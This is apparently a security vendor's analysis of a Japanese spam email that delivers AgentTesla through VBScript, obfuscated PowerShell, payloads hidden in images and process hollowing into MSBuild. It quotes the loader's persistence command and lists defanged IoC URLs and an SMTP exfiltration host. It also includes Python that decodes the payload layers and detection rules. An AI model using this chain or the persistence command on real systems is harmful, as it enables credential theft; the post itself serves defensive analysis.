Introduction
ITOCHU Cyber & Intelligence Inc. (ICI) routinely observes a large volume of spam emails to identify new attack tactics and the early stages of mass-attack campaigns targeting Japan. We pay particular attention to emails with attachments in unusual file formats or with a mail body written in Japanese, as these can indicate targeted attacks.
This blog post delves into the analysis of a recent Japanese-language spam email with a multi-stage infection process.
This sample combined several traditional attack tactics, including obfuscated VBScripts and PowerShell scripts, malicious code embedded in images (steganography), and the abuse of free image-hosting and text-sharing websites as payload retrieval infrastructure.
What is Steganography?
The art of concealing data within another medium.
Infection flow
The purpose of this sample was to deliver the AgentTesla malware to victims and execute it on their machines.
What is AgentTesla?
AgentTesla is an information stealer written for the .NET Framework that has been observed since 2014.
It can steal a variety of information from victims, including keystrokes, clipboard contents, screenshots, and authentication credentials for installed software. The stolen data is then exfiltrated to the attackers. https://attack.mitre.org/software/S0331/
The infection flow is as follows:
As you can see, several steps are involved in the process, from the receipt of the email to the final malware infection. Let's break down this process.
Malicious email
We have observed the following malicious email.
This email contained "payment-related" information, which is a common subject in email-based attacks. The sender's email address was a compromised email account belonging to a medical service company in Vietnam. Although the sender claimed to be the Bank of Japan, a file named "韓国銀行の領収書 (in English, Receipt from Bank of Korea)" was attached. This inconsistency raised suspicions.
The domain mentioned in the closing paragraph did not match the official Bank of Japan domain. Additionally, the service center contact details appeared to belong to a Thai bank, further contradicting the claim that this was a financial institution's email.
The attached file, 韓国銀行の領収書.tar.lz (md5: b73f8d56d31da6673025be38a4beb336), contained a VBScript file named 韓国銀行の領収書.vbs (md5: 6665a0f0f0b1d55cb8a85f115a8a1d07). Executing this VBScript file would ultimately lead to malware infection.
The .vbs extension is hidden by default in Windows, so the file appears to users simply as 韓国銀行の領収書.
Analysis results
Let’s analyze the VBScript file.
The script in the VBScript file first retrieves string data from a free text-sharing website called paste[.]ee. This technique of obtaining data from free text-sharing websites to drive subsequent stages of an attack has been observed before.
References
Furthermore, the error messages in the script are written in Portuguese. Is the developer of this VBScript fluent in Portuguese?
The VBScript concatenates the string data retrieved from paste[.]ee and performs string replacements on it, which yields a PowerShell script that is then executed.
This PowerShell script, as shown in the top part of Figure 5, replaces the string DgTre with the character A in the obfuscated string stored in the variable codigo (highlighted in green), and then Base64-decodes the result to execute the PowerShell script shown in the bottom part of Figure 5.
It is believed that the purpose of replacing specific strings and converting data into different formats is to evade detection by security products.
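As an added example (not code from the original post), the following Python replicates the unpacking step above for analysis: it restores the replaced marker, Base64-decodes the result, and lists any URLs in the recovered script. The marker DgTre and the variable name codigo come from the post; the sample script and the text-encoding fallback are assumptions.

```python
import base64
import re

# Added example, not the loader's own code. The marker "DgTre" and the
# variable name "codigo" come from the post; the sample script is constructed.

URL_RE = re.compile(r"https?://[^\s'\"]+")


def decode_layer(codigo: str, marker: str = "DgTre") -> str:
    """Put 'A' back where the loader had inserted MARKER, then Base64-decode.

    PowerShell loaders usually build such Base64 from UTF-8 or UTF-16LE text.
    The post does not name the encoding, so (assumption) we try UTF-8 first and
    fall back to UTF-16LE when the decoded bytes contain NUL padding."""
    restored = codigo.replace(marker, "A")
    raw = base64.b64decode(restored, validate=True)
    if b"\x00" in raw:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def extract_urls(script: str) -> list:
    """Pull URLs out of the decoded script so they can be added to IoC lists."""
    return URL_RE.findall(script)


# Constructed stand-in for the obfuscated string: a small script encoded the
# way the loader would see it (Base64, then every 'A' swapped for the marker).
SAMPLE_SCRIPT = "$u = 'https://example.invalid/img/new_image_vbs.jpg'; Invoke-WebRequest $u"
SAMPLE_CODIGO = base64.b64encode(SAMPLE_SCRIPT.encode()).decode().replace("A", "DgTre")

if __name__ == "__main__":
    decoded = decode_layer(SAMPLE_CODIGO)
    print(decoded)
    print(extract_urls(decoded))
```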
This PowerShell script fetches the image file new_image_vbs.jpg from a free image-hosting website, "uploaddeimagens[.]com[.]br", and extracts and uses malicious code embedded within the image data. An example of the image file is shown in Figure 6 (the actual image has been masked to protect copyright).
The PowerShell script contained two URLs, and while the images at both URLs had the same design, malicious code was only embedded in one of them.
This method, in which data is obtained from free image-hosting websites and malicious code is extracted from the image data, has been widely used by many malware families in the past.
References
We suspect that the attackers may use these detection-evasion techniques to fetch payloads:
- Retrieving data from image-uploading websites: Restricting access to these websites is challenging since they are not inherently malicious.
- Fetching data via HTTPS: Identifying the accessed path is difficult in environments that do not decrypt SSL/TLS traffic and log the decrypted requests.
The PowerShell script retrieves the image new_image_vbs.jpg from two URLs stored within the script. It then concatenates these images and extracts the string enclosed by the tags <<BASE64_START>> and <<BASE64_END>> embedded in the data. This extracted string is Base64-decoded and loaded as a .NET assembly. This .NET file is itself a loader-type malware, hereafter referred to as the ".NET Loader".
Following this, execution moves to the VAI method of the Home class within PROJETOAUTOMACAO.VB, provided by the .NET Loader. Several arguments are passed, including the reversed URL txt.ude/ba/moc[.]o<redacted>m//:spxxh. These arguments will be discussed later.
Note: <redacted> is a placeholder for the domain of the compromised website.
The VAI method first calls the start method of the Class6 class within the project. This method checks whether a file named Name_File.vbs exists in the C:\ProgramData\ directory. If the file is not found, it executes the following command to copy the VBScript file 韓国銀行の領収書.vbs from the current directory to C:\ProgramData:
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
To ensure persistence, the VAI method also registers C:\ProgramData\Name_File.vbs in the current user's Run key (SOFTWARE\Microsoft\Windows\CurrentVersion\Run).
The VAI method then resumes control and sets the _applicationName variable to C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBUILD.exe, as shown in Figure 9. This is a preparation for the code injection technique known as Process Hollowing, which will be discussed later.
Next, as shown in Figure 10, the reversed URL string is restored to its original state, and the final malware payload is retrieved.
In this sample, the string txt.ude/ba/moc[.]o<redacted>m//:spxxh was restored to the URL hxxps://m<redacted>o[.]com/ab/edu[.]txt, and data was retrieved from this URL.
The nature of the retrieved data suggested that it was encoded in Base64 and then reversed. Reversing and decoding it using CyberChef revealed that it was a PE file.
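The two payload layers described above, the tagged Base64 inside the concatenated image data and the reversed Base64 in edu.txt, can be decoded for analysis with the following Python. This is an added example, not the loader's code; the image bytes, the stand-in PE and the example.com URL are constructed.

```python
import base64
import re
from typing import List, Optional

# Added example, not the loader's own code. All sample bytes below are constructed.
TAG_RE = re.compile(rb"<<BASE64_START>>(.*?)<<BASE64_END>>", re.DOTALL)


def is_pe(data: bytes) -> bool:
    """Cheap sanity check: PE (and thus .NET) files begin with the 'MZ' DOS header."""
    return data[:2] == b"MZ"


def extract_from_images(images: List[bytes]) -> Optional[bytes]:
    """Concatenate the downloaded images (the loader fetches two, only one of
    which carries a payload) and decode the Base64 between the marker tags."""
    m = TAG_RE.search(b"".join(images))
    if m is None:
        return None
    return base64.b64decode(re.sub(rb"\s+", b"", m.group(1)))


def decode_reversed_b64(text: str) -> bytes:
    """edu.txt held Base64 that was then reversed; undo the steps in reverse order."""
    return base64.b64decode(text[::-1])


def restore_reversed_url(s: str) -> str:
    """The .NET Loader receives its URL reversed ('txt.ude/...') and flips it back."""
    return s[::-1]


# Constructed inputs: FAKE_PE stands in for the real loader and AgentTesla binaries.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 16
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x11" * 64 + b"\xff\xd9"
STEGO_JPEG = (b"\xff\xd8\xff\xe0" + b"\x22" * 64 + b"\xff\xd9"
              + b"<<BASE64_START>>" + base64.b64encode(FAKE_PE) + b"<<BASE64_END>>")
EDU_TXT = base64.b64encode(FAKE_PE).decode()[::-1]
REVERSED_URL = "txt.ude/ba/moc.elpmaxe//:sptth"  # example.com stands in for the redacted domain

if __name__ == "__main__":
    loader = extract_from_images([CLEAN_JPEG, STEGO_JPEG])
    print("loader is PE:", loader is not None and is_pe(loader))
    print("final payload is PE:", is_pe(decode_reversed_b64(EDU_TXT)))
    print("payload URL:", restore_reversed_url(REVERSED_URL))
```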
Finally, as shown in Figure 12, the malware launches the process specified in _applicationName, which is C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBUILD.exe, and injects the decoded PE file into the memory of that process. This is a process injection technique called Process Hollowing, used here to evade detection by security products.
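Added example (not from the post): detection logic for the two host behaviours described above, a Run key value that points at a script file and MSBuild.exe spawned by a script host without a project file, run over constructed Sysmon-style events. The event field names and the Run value name are simplified assumptions.

```python
import re
from typing import Dict, List, Tuple

# Added example, not code from the post. Event dicts use simplified field
# names (assumption), not the real Sysmon schema.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe"}
HOLLOW_TARGETS = {"msbuild.exe"}  # the LOLBin this sample hollowed
SCRIPT_EXT = re.compile(r"\.(vbs|js|ps1)\b")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def run_key_script_persistence(ev: Dict[str, str]) -> bool:
    """Run key value that launches a script file, as the VAI method registers."""
    if ev.get("type") != "RegistryValueSet":
        return False
    in_run_key = "\\currentversion\\run\\" in ev.get("target", "").lower()
    return in_run_key and bool(SCRIPT_EXT.search(ev.get("details", "").lower()))


def suspicious_msbuild_child(ev: Dict[str, str]) -> bool:
    """MSBuild.exe started by a script host with nothing after the image path
    (no project file) is consistent with process hollowing into MSBuild."""
    if ev.get("type") != "ProcessCreate":
        return False
    image, parent = basename(ev.get("image", "")), basename(ev.get("parent_image", ""))
    cmdline = ev.get("command_line", "").strip().rstrip('"').lower()
    no_args = cmdline.endswith(image)  # nothing follows the image path
    return image in HOLLOW_TARGETS and parent in SCRIPT_HOSTS and no_args


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    hits = []
    for i, ev in enumerate(events):
        if run_key_script_persistence(ev):
            hits.append((i, "run_key_script"))
        if suspicious_msbuild_child(ev):
            hits.append((i, "msbuild_hollowing"))
    return hits


# Constructed events: the first two mirror this sample, the last two are benign.
MSBUILD = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"
RUN_KEY = "HKU\\S-1-5-21-1\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\"
EVENTS = [
    {"type": "RegistryValueSet", "target": RUN_KEY + "Name_File", "details": "C:\\ProgramData\\Name_File.vbs"},
    {"type": "ProcessCreate", "image": MSBUILD, "parent_image": "C:\\Windows\\System32\\wscript.exe",
     "command_line": '"' + MSBUILD + '"'},
    {"type": "ProcessCreate", "image": MSBUILD, "parent_image": "C:\\VS\\devenv.exe",
     "command_line": '"' + MSBUILD + '" App.csproj /t:Build'},
    {"type": "RegistryValueSet", "target": RUN_KEY + "OneDrive", "details": "C:\\Users\\u\\OneDrive.exe /background"},
]

if __name__ == "__main__":
    print(triage(EVENTS))  # [(0, 'run_key_script'), (1, 'msbuild_hollowing')]
```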
References
Further analysis of the PE file extracted using CyberChef revealed that it is AgentTesla, a .NET-based malware.
AgentTesla is capable of exfiltrating stolen information via email. The email exfiltration destination was identified as mail[.]privateemail[.]com (port: 587, protocol: smtp).
Figure 13 illustrates the malware configuration of AgentTesla.
Discussion
We've observed attacks using similar infection techniques to deliver multiple malware families, including Remcos and XLoader (formerly Formbook). Analysis of related samples reveals that the attackers actively change file formats, using XLA and RTF, indicating an adaptive approach.
The day before the Japanese version of this post was published (April 15, 2024), PT Security released a blog post on the SteganoAmor campaign. The samples described in that post were similar to those we were analyzing at the time.
Reference:
SteganoAmor campaign: TA558 mass-attacking companies and public institutions all around the world
We consider this tactic to be one that warrants continued attention, as it is likely to be developed further for detection evasion and anti-analysis. This could include more complex infection flows using multi-stage payload retrieval, script obfuscation, and the adoption of new techniques.
Countermeasures
We have implemented the following countermeasures to defend against malicious emails containing malware:
- Utilize spam filters to quarantine emails with attached VBS files or other malicious files with unusual extensions.
- Deploy specialized tools to detect such files inside compressed archives such as ZIP files.
IoCs
| file name | type | MD5 | SHA1 | SHA256 |
|---|---|---|---|---|
| 韓国銀行の領収書.tar.lz | Attachment | b73f8d56d31da6673025be38a4beb336 | c13241205c24133f1d042283777c94fc9f083959 | a5cd72de5d9b49324a4c3acce4dfd99b9cd07c5561b3df3178d5773980a327ad |
| 韓国銀行の領収書.vbs (extracted from 韓国銀行の領収書.tar.lz) | Downloader | 6665a0f0f0b1d55cb8a85f115a8a1d07 | 0db07da604d0ad9b033df395b3843a815ae415c9 | b9bbdc47e828eac24efc1576ef757a4a9fe72627f591b6ba74c6a57d6b47cc17 |
| 1gYLt | Malicious code | f94961734344d5b8f90871c428d180ea | b8ab78334f58e1cdf9374ffa8b4697f1cf2313ec | 10f0724e4a33ecb99465285d8b77602c68d07533cfaee7a7cea9f5f5ac273398 |
| new_image_vbs.jpg (979/original) | Image file | 63d7161e549f4ae373e2ec328cc10bcc | e074e84f245766b5693bb85a3be48ce65196a79b | 8b337abd81fe0fa0cfb773bc185da8ebcca425adb14f81c61e7c060e7d81aea1 |
| new_image_vbs.jpg (978/full/) | Image file | f48bc3d4ae14d039e9577aefbd64a680 | 1c47b7302dcaf3950dbf34d2bf9b91ca56078ba2 | 125514526ff630048097768f8d247112b0ff80b16126b32a3440dc5416998a64 |
| N/A | Downloader (embedded in an image) | 8bae771d41d8713a3583d24005c9039b | 6895ea61ce4600e6129353b0c5ae58f16bf26a78 | bbd3b070c7a7185603cdbfb576e7bcc9c01cd5c8263666b3a3ee5de5e3a427ab |
| edu.txt | Encoded AgentTesla | 3d95db8e258c5c636f6c0e167b2a47fe | bb65218a2eec9689b6db9a6c2aa8a6dfc531b6d3 | 0efdd91c6d1ffeca6e8eda3ece36cd849272dce1a2d9ab3c208be65a370d4493 |
| N/A | AgentTesla | 59a8039570f0634f82e7d25bddd37658 | 868fc0385ba057cef96178eb54f04677fc4a3aed | eda52b32b68b4a7f91bf7ddc52967d6541aa2d7d0ffbfd7a2cf1f70727bae239 |

| Destinations |
|---|
| hxxps://paste[.]ee/d/1gYLt |
| hxxps://uploaddeimagens[.]com[.]br/images/004/766/979/original/new_image_vbs[.]jpg?1712588500 |
| hxxps://uploaddeimagens[.]com[.]br/images/004/766/978/full/new_image_vbs[.]jpg?1712588469 |
| hxxps://m<redacted>o[.]com/ab/edu[.]txt |
| mail[.]privateemail[.]com (port: 587, protocol: smtp) |